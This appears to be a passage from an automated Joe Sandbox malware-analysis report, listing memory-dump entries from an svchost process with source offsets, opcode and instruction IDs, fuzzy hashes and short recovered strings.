                                                                    • Instruction Fuzzy Hash: A4117F75F00215DFDB40EB798904B6EBBF5BF88640F1484ADE60AE7395EB359900CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: 967b77183bcb6e42cb987c0b9a19b9019a57a62761bc19909ab0e33be07c309f
                                                                    • Instruction ID: 15f5b44d397256f96a9fe41c18f85e672bab1f76bf66abfec0a61976847dfa57
                                                                    • Opcode Fuzzy Hash: 967b77183bcb6e42cb987c0b9a19b9019a57a62761bc19909ab0e33be07c309f
                                                                    • Instruction Fuzzy Hash: 7C117F74B00104DFDB149F69C498B6EBBF6EF88714F154069FA01AB3A5CE719C45CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: fe68177cd6f8b20684c8201fcaabe37b2330e5fc687875e928334743f490b412
                                                                    • Instruction ID: 13bab45ae5eb27666f458cc75f784c5fbeccebfa19fd7a0469367b8b9c768826
                                                                    • Opcode Fuzzy Hash: fe68177cd6f8b20684c8201fcaabe37b2330e5fc687875e928334743f490b412
                                                                    • Instruction Fuzzy Hash: 66113D70B101049FDB149F69C499BAABBF6AF88714F144059FA02AB3A5CA719C41CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tefq
                                                                    • API String ID: 0-1066582953
                                                                    • Opcode ID: af616ac6b828df0ef38ec2ed5fa4dcc55c806c95bd2d3db0fbdcb153a938c1f2
                                                                    • Instruction ID: df59ead7f96d27e582f89da915cea93061460bcaea74905bbb4ae51708bdb22c
                                                                    • Opcode Fuzzy Hash: af616ac6b828df0ef38ec2ed5fa4dcc55c806c95bd2d3db0fbdcb153a938c1f2
                                                                    • Instruction Fuzzy Hash: A911AC717002049FCB189B29C859BAEBBF6AF88711F20406DE606EB3A0CF759C05CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: W
                                                                    • API String ID: 0-655174618
                                                                    • Opcode ID: ed6ee51bf5564e31050cad50e0d6d1d1c455b3998d9b290fd6d4fe74a52406c7
                                                                    • Instruction ID: 1e3ed68390eda22823a814d4bef0f6e3f7302a5bee4084bab39b03aedd4069b5
                                                                    • Opcode Fuzzy Hash: ed6ee51bf5564e31050cad50e0d6d1d1c455b3998d9b290fd6d4fe74a52406c7
                                                                    • Instruction Fuzzy Hash: 20119EB5A012999FDB04DFA4D550ADDBFF2AF48310F10806AE801B7250CB305D40CF90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'fq
                                                                    • API String ID: 0-2007657732
                                                                    • Opcode ID: 773c79454e88cad07ede7e19f6e16572298d1d09618cc3b6fccfe286fc5eec74
                                                                    • Instruction ID: 5d509767d1b322802ee88216191589c33af6865f9c9784c658429b4669a5b26f
                                                                    • Opcode Fuzzy Hash: 773c79454e88cad07ede7e19f6e16572298d1d09618cc3b6fccfe286fc5eec74
                                                                    • Instruction Fuzzy Hash: F501B531B001059FCB48EBF8E855A9D3BA1FF85218F0050DDD105AB3A5DF3A9D058B82
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Hjq
                                                                    • API String ID: 0-3368716452
                                                                    • Opcode ID: 9c7504db5606d7b535e7712fd64c2586caafa4d0f6eaef742e98446cea24a5b9
                                                                    • Instruction ID: 781ee2784bb60988218bdf947dd13407c842ae5a48c42c562d5c8cd96af98237
                                                                    • Opcode Fuzzy Hash: 9c7504db5606d7b535e7712fd64c2586caafa4d0f6eaef742e98446cea24a5b9
                                                                    • Instruction Fuzzy Hash: 94F0C2217083505FC74AAA3D585442FBFDBAFDA15031544AAF349CB3A7CE658C0683A5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'fq
                                                                    • API String ID: 0-2007657732
                                                                    • Opcode ID: 9c8f77d6e472aa23cd73b66a51ba8f476e8f3d9bd904f4c17f0da1013b9ffc11
                                                                    • Instruction ID: cc0ef4596baec2363cd58d3567830436e19a6756278ea38dc2c81fe5bd2e4da6
                                                                    • Opcode Fuzzy Hash: 9c8f77d6e472aa23cd73b66a51ba8f476e8f3d9bd904f4c17f0da1013b9ffc11
                                                                    • Instruction Fuzzy Hash: 6501D6713006022FC719E728E850AAFBBEAEBC6240704456ED405CBA55DF25AC46D3F1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: xjq
                                                                    • API String ID: 0-3434123017
                                                                    • Opcode ID: 4581025c2551bb3abdf09809553fc53d51959152e7641ba000c057fde8152838
                                                                    • Instruction ID: fdf0531d196d0d3a1a6c8de0834414f1e906fb22ab3b8d0c2a1c12405d09cebf
                                                                    • Opcode Fuzzy Hash: 4581025c2551bb3abdf09809553fc53d51959152e7641ba000c057fde8152838
                                                                    • Instruction Fuzzy Hash: C4018FB17147008FD718EB28E849BBB37A2EBC5614F10852DE55A8B784DB39AC46DB40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2938537097.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_76c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: xjq
                                                                    • API String ID: 0-3434123017
                                                                    • Opcode ID: 55440ad219db64f3f689bd3835ecc610ce7c2b4bc46154a1d89ac2c54c4afbcc
                                                                    • Instruction ID: f73fecfd21a0df667ad7b855db8587e5920768ae629db02d0d41de1d2b69283f
                                                                    • Opcode Fuzzy Hash: 55440ad219db64f3f689bd3835ecc610ce7c2b4bc46154a1d89ac2c54c4afbcc
                                                                    • Instruction Fuzzy Hash: 3E0162747107008FD748EF28E959BBA76A2EBC4714F00815DA9078B7C4DF39AC15DB40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'fq
                                                                    • API String ID: 0-2007657732
                                                                    • Opcode ID: dcfe5c306effb37ccd8615335bf533acc8e3c3b98e6f2b9699d64a1a24c0caf1
                                                                    • Instruction ID: fa057cdc5c239b5f30cbfb95385be0440648fe5f3a085723b64a78c111bb5260
                                                                    • Opcode Fuzzy Hash: dcfe5c306effb37ccd8615335bf533acc8e3c3b98e6f2b9699d64a1a24c0caf1
                                                                    • Instruction Fuzzy Hash: C7F096703006025BC61CE76CD4909AE77D7EBC9640314492DD406CB754EF35EC4697E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6497b7d79473f29879e01ba3bef049d64fd246755ceef83113c4646d34b39cea
                                                                    • Instruction ID: 5950fb2c0b291134b75fcf0bd3bf49af21370adde9cba8859bb3bb9f30b77641
                                                                    • Opcode Fuzzy Hash: 6497b7d79473f29879e01ba3bef049d64fd246755ceef83113c4646d34b39cea
                                                                    • Instruction Fuzzy Hash: A4423BB5600706DFC725DF68C58499AFBF2FF88310B158A69E44A9B652DB30FC85CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e5bf7dad00a3d76a997f446616b9c86003480af8171bb04b87bccf0fdecdef6c
                                                                    • Instruction ID: d190cc9a73fad6227daef9218146b487dc56d9ca5ddb57c0ecb43233e3b78a19
                                                                    • Opcode Fuzzy Hash: e5bf7dad00a3d76a997f446616b9c86003480af8171bb04b87bccf0fdecdef6c
                                                                    • Instruction Fuzzy Hash: A61238B47006028FCB14DF69C898AAABBF6FF89300B1544ADE506DB362DB35EC45CB51
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ea4dd9e6884a9594a642298a9b7105b8cb8f01a6061301b5f9be3791c3620b0d
                                                                    • Instruction ID: c6e43a0ac17d51e7f0056085a3fd5a72f57f34b0fe1fd526ac8362cb6d8399b2
                                                                    • Opcode Fuzzy Hash: ea4dd9e6884a9594a642298a9b7105b8cb8f01a6061301b5f9be3791c3620b0d
                                                                    • Instruction Fuzzy Hash: 94125C75B40211CFCB08DF38D69882A77F6EF8965431145A9EA19CB37AEB31EC45CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b3d01d02a43be47a5e567e815eb2c6d2e131217a75c7b5a98a4b5735d1fa7455
                                                                    • Instruction ID: c8f1b03c07fab9462599ed457e417c68f42fa1189b190468610cb5388d839e39
                                                                    • Opcode Fuzzy Hash: b3d01d02a43be47a5e567e815eb2c6d2e131217a75c7b5a98a4b5735d1fa7455
                                                                    • Instruction Fuzzy Hash: 29F148757006018FDB55DF29C499AAABBE2FF89310F1984ADE646CB372CB35E900CB51
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8e17db9308071c4d2bf94262e2990be6562596b5a5422d478dd1097d088e1fc2
                                                                    • Instruction ID: a272ad727ee479648b63ffdce6a8ecf20abfa3ee28fcd88a9e0faa74d3270bc1
                                                                    • Opcode Fuzzy Hash: 8e17db9308071c4d2bf94262e2990be6562596b5a5422d478dd1097d088e1fc2
                                                                    • Instruction Fuzzy Hash: 64C193B6B01222DFCB24CFA4C454BA9B7A3BB84705F15896ED9068B3D5CB35DC81CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a1e9fa08d0c538bf40b13240cedc4ef5c6c013b414a91014b65f587d42610f19
                                                                    • Instruction ID: 36d096c073fa98feec66a3d476c30e405d2b2da4813824ecc2a6d2412b39fe7a
                                                                    • Opcode Fuzzy Hash: a1e9fa08d0c538bf40b13240cedc4ef5c6c013b414a91014b65f587d42610f19
                                                                    • Instruction Fuzzy Hash: 0791809210D2A10BE707677C9CB13DB7F62DF47265F0954ABC2858B2D3D924884ED2BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5f89a03fb1724a03930898a8d122ff738fc4f94c715bc6497928bdbb560e7e62
                                                                    • Instruction ID: ef30f3a3d618f497c716ecbd02dfcd5d9c072bb87a7390bef92459dcc8a05a00
                                                                    • Opcode Fuzzy Hash: 5f89a03fb1724a03930898a8d122ff738fc4f94c715bc6497928bdbb560e7e62
                                                                    • Instruction Fuzzy Hash: D4B149F07006029FE7348F69C4946ABB7F6BF85600F14492AE88AD7791DB34ED46CB61
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d6d9d5cef2db2320ba6fe89adbec1ef77df66d66ed681d69c35150da2953968f
                                                                    • Instruction ID: 6016be270392a66bba199b3102b1ebe73259d36e01fdfe620c013e15c43d688f
                                                                    • Opcode Fuzzy Hash: d6d9d5cef2db2320ba6fe89adbec1ef77df66d66ed681d69c35150da2953968f
                                                                    • Instruction Fuzzy Hash: 7BB191B1705341DFD325CF68D598AA6BBE2FF85210B19C4AAD40ACB762CB31EC85C752
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7a944ae61e7669ac3585fc08810433e0e26f94a22c9352d0a1fde44bbc5f2391
                                                                    • Instruction ID: eeb72fcefe9b5b33fa6b06dee0c702be0470edf5e81da66e29b10bc94c15c2e8
                                                                    • Opcode Fuzzy Hash: 7a944ae61e7669ac3585fc08810433e0e26f94a22c9352d0a1fde44bbc5f2391
                                                                    • Instruction Fuzzy Hash: BAC10B74B00105CFCB08DB78D558A6EB7F2EF89314B2185A9EA06EB3A5CB75DC41CB51
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 362ac353419cd99ce5e2bdd1dafb28358ce76da5399b9d394218e9cfd9e384a6
                                                                    • Instruction ID: f53671a8571785a81e72cde1561d47fe665604c547ba794f1f4ebab13943a76a
                                                                    • Opcode Fuzzy Hash: 362ac353419cd99ce5e2bdd1dafb28358ce76da5399b9d394218e9cfd9e384a6
                                                                    • Instruction Fuzzy Hash: 12B16CB0204741CFD731CB69D584BA5BBE2FF41354F4884AAD4898B6A2E775FC89CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a723dcceb0370e145880f2b0ec203acac69a0bfb156b4a556809b6f7ad66093
                                                                    • Instruction ID: 0922aaf3f0f82baa2fc985080e90aa629ba37c8d53fbd2a6b72f92ff47143e88
                                                                    • Opcode Fuzzy Hash: 0a723dcceb0370e145880f2b0ec203acac69a0bfb156b4a556809b6f7ad66093
                                                                    • Instruction Fuzzy Hash: 13B11671E002099FDF10CFA9D98579EFBF2AF88314F14852DE915AB394EB749885CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6bb2c7a32782a154a1c931acfc3e6d122252157742f307b1980cf5114bc7b60
                                                                    • Instruction ID: 4d93616aa2b90ab6ab4c0c6a5cfcdf985f392075e328b4b5f365056df206e7db
                                                                    • Opcode Fuzzy Hash: e6bb2c7a32782a154a1c931acfc3e6d122252157742f307b1980cf5114bc7b60
                                                                    • Instruction Fuzzy Hash: C2A18E70B00305CFCB09EF78E59861EB7A2FBC9214B24856DDA069B355EF359C4ACB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 246140bcff9403b4a5a958d40114e677ed3b739283bd4d7f85eb5a8d559a57be
                                                                    • Instruction ID: 6e99d984cfe443e2019b02eca9dafe1d188fcc05ab29c71cf0da21a4d865d869
                                                                    • Opcode Fuzzy Hash: 246140bcff9403b4a5a958d40114e677ed3b739283bd4d7f85eb5a8d559a57be
                                                                    • Instruction Fuzzy Hash: 12A16CB0A00206DFCB25DF68D894AADBBF2FF88310F148169E9159B3A5DB35DD51CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2939185926.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ad0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 38a5934d59c524955f7a5f025313dae7698df202bd974ac36e9e34de9da55856
                                                                    • Instruction ID: d893595c34cd59e373d7587b5ddff5248c2f1b396044478d7fb2d7170291205a
                                                                    • Opcode Fuzzy Hash: 38a5934d59c524955f7a5f025313dae7698df202bd974ac36e9e34de9da55856
                                                                    • Instruction Fuzzy Hash: B691AFB4B006169FCB08AB68D854AEE7BF6FFC8310F108929E91697394DF349D45CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2939185926.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ad0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 234255e6d33a38ea94e846ee81530bc7af624fb721f4adc19d18f39dbee8e55f
                                                                    • Instruction ID: dd35dadac1acba29e708e58ec4791fd1cfef44fddb15b8ba8dfacbc8abc788b5
                                                                    • Opcode Fuzzy Hash: 234255e6d33a38ea94e846ee81530bc7af624fb721f4adc19d18f39dbee8e55f
                                                                    • Instruction Fuzzy Hash: 57A159B46007029FC709DF28C494D99BBF2FF883107108A99E45A9B762DB31FD89CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d31e872d81e9dbf098b22c0d409974122298f8a3ea843d6f3056e566559b7392
                                                                    • Instruction ID: a7cb8e4e1351f1dacb5b6734d0ac386935c2dc6536ef168f3ab05beb31e1217e
                                                                    • Opcode Fuzzy Hash: d31e872d81e9dbf098b22c0d409974122298f8a3ea843d6f3056e566559b7392
                                                                    • Instruction Fuzzy Hash: 57A15DB4B00341DFCB05DF34E48865EBBB2FB85354B208669E9068B356DF349D56CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 74d2784d2247673d432b41fd88324d2bb7eb334aefb8655e79a4d5e15e9a13b0
                                                                    • Instruction ID: 4548b49dea997a9b8fae1f711a19b6270e44288b440144ca037f7d7a5b8104eb
                                                                    • Opcode Fuzzy Hash: 74d2784d2247673d432b41fd88324d2bb7eb334aefb8655e79a4d5e15e9a13b0
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2939185926.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ad0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 41dd584e92394df133dff2a696fd477e79e8163fe8fbc1fd873dab6c118472cd
                                                                    • Instruction ID: 0c638b11f97eea17e3567008e21407f920da2fefa0892b24048aac1a0fc33604
                                                                    • Opcode Fuzzy Hash: 41dd584e92394df133dff2a696fd477e79e8163fe8fbc1fd873dab6c118472cd
                                                                    • Instruction Fuzzy Hash: FC51B0B1A003069FCB04DB58D880AAFBBF6FF84314B14C959E5199B211DB71FD46CBA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a10528f1865c814ec9f2353256fae201eb17631804caea9112e7395374ce9452
                                                                    • Instruction ID: 04a2ea7864f65e42961ec4c71ad60197c84d8093fe601d6ef3a517c69603a07e
                                                                    • Opcode Fuzzy Hash: a10528f1865c814ec9f2353256fae201eb17631804caea9112e7395374ce9452
                                                                    • Instruction Fuzzy Hash: 895157B1A00205EFDB19DFA9D854AEEBBB2FFC9310F14846AE41697291CB359C46CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 21cee4f80a075c93b0cbf75dba5100006a3f3b1df9c8dcc6d507b7947372689f
                                                                    • Instruction ID: 17c0b3b7b4edc65db7eb2ce48c20a93da93aa1391f274b6105ed9bb5d13b1d46
                                                                    • Opcode Fuzzy Hash: 21cee4f80a075c93b0cbf75dba5100006a3f3b1df9c8dcc6d507b7947372689f
                                                                    • Instruction Fuzzy Hash: 855127B1A00205DFDB15DFA9D890AEEBBF2FFC8310F14846AE51697694CB359C46CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936689249.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75c0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a24b96bfd0b551d44f95e97bd526f93d8d19c18ee4923bc948983e5c8ca89926
                                                                    • Instruction ID: 0d31c36012778fdadb48e96db9a64dea77f35c4cb4476ad84d214e42346ee9d1
                                                                    • Opcode Fuzzy Hash: a24b96bfd0b551d44f95e97bd526f93d8d19c18ee4923bc948983e5c8ca89926
                                                                    • Instruction Fuzzy Hash: ED4123B13047419FCB25DB7AD89469BBBEAEFC5210B00892EE50A87755DF34EC05C7A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2939185926.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7ad0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6b3bf588d27c9cebf32204650a65a82285be1a62db5124f880ca9e0a8fb98e42
                                                                    • Instruction ID: 1cb062afa57796722d79a096c559dab2213482fc879ddf13cce153ee5545d609
                                                                    • Opcode Fuzzy Hash: 6b3bf588d27c9cebf32204650a65a82285be1a62db5124f880ca9e0a8fb98e42
                                                                    • Instruction Fuzzy Hash: EC41F7727057118FC725CB29E88096BBBE9EFC567071989AAE4698B651CA30FC40C7B0
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2936929588.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_75d0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5670dee0c6b9fcbefae0ce91800b7333a1cf1fe88835c7b606e90d6013c227cb
                                                                    • Instruction ID: f330cf5c71cb5d1e44463c28826452062db00471047fbfc9d5719e86fb160c96
                                                                    • Opcode Fuzzy Hash: 5670dee0c6b9fcbefae0ce91800b7333a1cf1fe88835c7b606e90d6013c227cb
                                                                    • Instruction Fuzzy Hash: ED4149B1A00205DFDB19DFA9D850AEEBBB2FFC8310F14842AE41697394DB359C46CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2919109197.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_17f0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ea437ed4d6c1654011dc105271102eb0a07dbfa1a37975526b0767b125c09ceb
                                                                    • Instruction ID: b7c774edc02334d59557e566de3f8cc748c276b76bb55c5e65bda45b8c528f18
                                                                    • Opcode Fuzzy Hash: ea437ed4d6c1654011dc105271102eb0a07dbfa1a37975526b0767b125c09ceb
                                                                    • Instruction Fuzzy Hash: 2B51B670A00201CFC71ADF2CF49C5597763FB893857609A68EC059B269EB39AD66DF80
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2935680599.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_7540000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
